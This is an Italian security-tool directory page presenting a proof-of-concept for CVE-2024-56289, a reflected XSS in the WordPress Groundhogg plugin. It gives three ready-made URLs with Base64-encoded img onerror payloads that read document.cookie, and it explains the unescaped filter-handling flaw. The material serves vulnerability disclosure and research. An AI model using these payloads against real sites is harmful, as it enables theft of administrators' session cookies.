Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-56289 — Proof-of-concept exploit per una vulnerabilità XSS riflessa nel plugin WordPress Groundhogg, che dimostra l'iniezione di script non autenticata tramite parametri URL appositamente costruiti. | Kitploit
Strumenti/GitHubGitHub/dottak/cve-2024-56289
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubdottak/cve-2024-56289

CVE-2024-56289

Proof-of-concept exploit per una vulnerabilità XSS riflessa nel plugin WordPress Groundhogg, che dimostra l'iniezione di script non autenticata tramite parametri URL appositamente costruiti.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-56289

1️⃣ Tipo di componente

Plugin WordPress

2️⃣ Dettagli del componente

Nome del componente WordPress CRM, Email & Marketing Automation for WordPress | Award Winner — Groundhogg

Versione vulnerabile <= 3.7.3.2

Slug del componente groundhogg

Link del componente https://wordpress.org/plugins/groundhogg/

3️⃣ OWASP 2017: TOP 10

Classe di vulnerabilità A3: Injection

Tipo di vulnerabilità Cross Site Scripting (XSS)

4️⃣ Prerequisito

Non autenticato

5️⃣ Dettagli della vulnerabilità

👉 Breve descrizione

Le versioni 3.7.3.3 e precedenti del plugin Groundhogg contengono una vulnerabilità di tipo Reflected Cross Site Scripting dovuta a una validazione insufficiente dell'input e a una mancata gestione dell'escaping dei parametri URL. Questa vulnerabilità si verifica quando si utilizza la funzionalità di filtro di ricerca nei menu 'Contatti', 'Funnel' e 'Registri' della dashboard del plugin.

Tramite questa vulnerabilità, un utente non autenticato può creare un URL contenente script dannosi e, quando altri utenti accedono a questo URL, lo script viene eseguito nel loro browser, potenzialmente causando la divulgazione delle informazioni dei cookie. Ciò rappresenta un serio rischio per la sicurezza, poiché può essere sfruttato in particolare per dirottare le sessioni degli utenti con privilegi di amministratore.

👉 Come riprodurre (PoC)

  1. Preparare un sito WordPress con il plugin 'Groundhogg' <=3.7.3.2 attivato.

    Poiché questo plugin utilizza la REST API, il Permalink deve essere impostato su Nome del post.

  2. Successivamente, l'accesso ai link per ciascun menu di seguito attiverà una vulnerabilità di tipo Reflected XSS.

    • Menu Contatti(/wp-admin/admin.php?page=gh_contacts)

      root@kitploit:~
      http://localhost:8080/wp-admin/admin.php?page=gh_contacts&filters=W1t7ImlkIjoiIiwidHlwZSI6ImZpcnN0X25hbWUiLCJjb21wYXJlIjoiZXF1YWxzIiwidmFsdWUiOiI8aW1nIHNyYz1cInhcIiBvbmVycm9yPVwiYWxlcnQoZG9jdW1lbnQuY29va2llKVwiPiJ9XV0
      

      image

    • Menu Funnel(/wp-admin/admin.php?page=gh_funnels)

      Per riprodurre la vulnerabilità XSS in questo menu, deve esistere almeno 1 Funnel.

      root@kitploit:~
      http://localhost:8080/wp-admin/admin.php?page=gh_funnels&status=inactive&include_filters=W1t7ImlkIjoiMTBjY2FmZmUtZjE0YS00MTg5LWE0MzctYjA2MTFhMTQ2ZDk1IiwidHlwZSI6InRpdGxlIiwidmFsdWUiOiI8aW1nIHNyYz1cInhcIiBvbmVycm9yPVwiYWxlcnQoZG9jdW1lbnQuY29va2llKVwiPiIsImNvbXBhcmUiOiJlcXVhbHMifV1d
      

      image

    • Menu Registri(/admin.php?page=gh_events)

      root@kitploit:~
      http://localhost:8080/wp-admin/admin.php?page=gh_events&tab=emails&include_filters=W1t7ImlkIjoiIiwidHlwZSI6ImZyb21fYWRkcmVzcyIsInZhbHVlIjoiPGltZyBzcmM9XCJ4XCIgb25lcnJvcj1cImFsZXJ0KGRvY3VtZW50LmNvb2tpZSlcIj4iLCJjb21wYXJlIjoiZXF1YWxzIn1dXQ
      

      image

👉 Informazioni aggiuntive (opzionale)

[Causa della vulnerabilità]

Quando si eseguono ricerche con filtro nei menu 'Contatti', 'Funnel' e 'Registri' della dashboard del plugin Groundhogg, le impostazioni del filtro vengono codificate in Base64 prima di essere passate come parametri URL.

Ad esempio, quando si imposta una ricerca con filtro nel menu 'Contatti' in cui 'Nome' è impostato su 'Test', il parametro URL filters riceve i seguenti dati:

root@kitploit:~
W1t7ImlkIjoiMjM3NzdjMGItYTQ1Ni00M2JlLWExZGMtODkzN2E1MDk0M2I5IiwidHlwZSI6ImZpcnN0X25hbWUiLCJjb21wYXJlIjoiZXF1YWxzIiwidmFsdWUiOiJUZXN0In1dXQ

image

Quando il valore inserito nel parametro URL filters viene decodificato in Base64, è possibile vedere i seguenti dati.

root@kitploit:~
[[{"id":"23777c0b-a456-43be-a1dc-8937a50943b9","type":"first_name","compare":"equals","value":"Test"}]]

image

Quando viene richiesta una ricerca con filtro, viene eseguita la funzione scripts della classe Contacts_Page nel file /wp-content/plugins/groundhogg/admin/contacts/contacts-page.php.

A questo punto, il parametro URL filters codificato in Base64 viene decodificato e passato alla variabile ContactSearch nell'area JavaScript della risposta HTTP.

image

Pertanto, è possibile verificare che nei dati della risposta HTTP, i dati codificati in Base64 passati al parametro URL filters vengono decodificati prima di essere consegnati.

image

Successivamente, i dati decodificati vengono inseriti direttamente negli elementi DOM che visualizzano i risultati della ricerca con filtro tramite la logica JavaScript.

image

Attraverso questo meccanismo, il termine di ricerca con filtro (&lt;img src="x" onerror="alert(document.cookie)"&gt;) inserito nel PoC viene passato come variabile nel codice JavaScript senza gestione dell'escaping e viene inserito ed eseguito negli elementi DOM dalla logica client.

image

image

Di conseguenza, a causa della gestione insufficiente dell'escaping dei dati di ricerca con filtro, i valori contenenti script dannosi possono essere eseguiti direttamente, e questa vulnerabilità si verifica allo stesso modo in tutti i menu 'Contatti', 'Funnel' e 'Registri'.

6️⃣ Demo dello sfruttamento

video

7️⃣ Riferimenti

  • https://nvd.nist.gov/vuln/detail/CVE-2024-56289
Scarica lo strumento